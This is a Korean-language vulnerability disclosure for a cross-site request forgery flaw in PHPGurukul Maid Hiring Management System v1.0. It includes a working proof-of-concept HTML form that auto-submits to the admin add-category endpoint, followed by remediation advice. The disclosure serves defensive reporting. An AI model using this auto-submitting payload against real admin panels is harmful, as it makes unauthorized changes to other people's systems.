
PHPGurukul Maid Hiring Management System v1.0의 CSRF 취약점에 대한 개념 증명으로, 조작된 악성 요청을 통해 승인되지 않은 카테고리 생성을 시연합니다.
프로젝트 이름 및 저장소 URL: PHP 및 MySQL을 사용한 메이드 채용 관리 시스템
취약점 유형: 클라이언트 측 요청 위조
영향받는 버전: v1.0
💣취약점 설명: PHPGurukul 채용 관리 시스템의 관리자 패널에 교차 사이트 요청 위조(CSRF) 취약점이 존재합니다. 인증된 관리자가 악성 사이트를 방문하도록 속여 공격자가 임의의 채용 카테고리를 추가할 수 있습니다. 이로 인해 데이터 오염 및 승인되지 않은 관리자 수준 변경이 발생할 수 있습니다.
👩💻영향: 승인되지 않은 카테고리 생성
🛜개념 증명 (PoC)
1)인증된 관리자만 카테고리를 추가할 수 있는 카테고리 추가 기능이 있었습니다.
2)/admin/add-category.php 엔드포인트로 POST 요청을 보내는 HTML 코드
CSRF-POC

<html>
<body>
<form action="http://127.0.0.1/mhms/admin/add-category.php" method="POST">
<input type="hidden" name="catname" value="CSRF-POC" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
3)HTML 코드를 사용하여 악성 URL을 만듭니다.
4)관리자가 링크를 클릭하면 새 카테고리가 추가됩니다.

권장 사항: 관리자 양식에 CSRF 토큰을 구현하고, SameSite 쿠키를 적용하며, 요청 출처를 검증하여 승인되지 않은 작업을 방지해야 합니다.